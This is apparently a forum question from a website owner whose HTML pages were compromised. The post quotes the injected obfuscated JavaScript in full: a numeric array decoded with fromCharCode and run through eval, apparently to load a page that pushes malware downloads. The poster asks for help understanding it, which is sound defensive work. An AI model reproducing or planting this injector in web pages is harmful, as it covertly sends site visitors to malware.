A hacker added a JavaScript to many html pages of my site. Just after the body-tag he added:
<!--<script>try{1-prototype;}catch(asd){x=2;}
if(x){fr="fromChar";f=[4,0,91,108,100,88,107,95,100,101,22,91,105,99,54,91,90,29,32,22,112,4,0,107,88,104,21,96,92,103,100,22,50,23,90,100,90,107,98,92,100,105,37,89,103,92,87,105,92, 59,97,92,99,90,101,106,29,30,95,91,105,87,98,92,29,30,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,101,102,105,94,107,95,100,101,51,28,88,88,104,102,98,106,107,91,28,50,3,-1,96,92,103,100,36,104,107,111,97,92,36,105,102,102,50,30,35,46,48,47,90,100,29, 48,4,0,94,93,104,98,37,105,105,112,98,90,37,98,90,93,106,50,30,35,46,48,47,90,10 0,29,48,4,0,94,93,104,98,37,105,103,90,22,21,52,22,23,95,106,105,103,48,36,38,98 ,106,101,90,91,36,89,103,92,87,105,96,101,99,37,90,90,38,99,86,96,100,35,103,94, 101,25,49,2,1,95,91,105,99,35,96,90,21,52,22,28,93,104,98,64,90,28,50,3,-1,91,101,88,108,99,90,101,106,35,89,101,89,112,36,86,103,102,90,101,90,56,95,95, 97,91,30,94,93,104,98,32,49,2,1,115,48,4,0,108,96,100,89,102,109,35,102,100,97,1 02,87,89,23,51,21,93,104,98,56,90,89,50,3,-1];v="eva";}if(v)e=window[v+"l"];w=f;s=[];r=String;z=((e)?"Code":"");zx=fr+z;for(i=0;288-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e("j%3"))));}
if(x&&f&&012===10)e(s);</script><!--
It somehow directs the browser to a site where the hacker deposited some malware for automatic download.
But I do not understand the details.
try{1-prototype;}catch(asd){x=2;} somehow sets x to 2 - but how does that happen?
v="eva";}if(v)e=window[v+"l"]; somehow creates an eval statement.
f (and then also w ) contain an encrypted statement.
In the for loop, the statement gets decrypted by s=s+fromCharCode((w[j]*1+(9+eval("j%3"))));
and finally executed by e(s); .
Since I hardly ever write JavaScript, I fail to understand the details.
I hope that you have fun with analysing that script, and that you can share some hints on its function.
|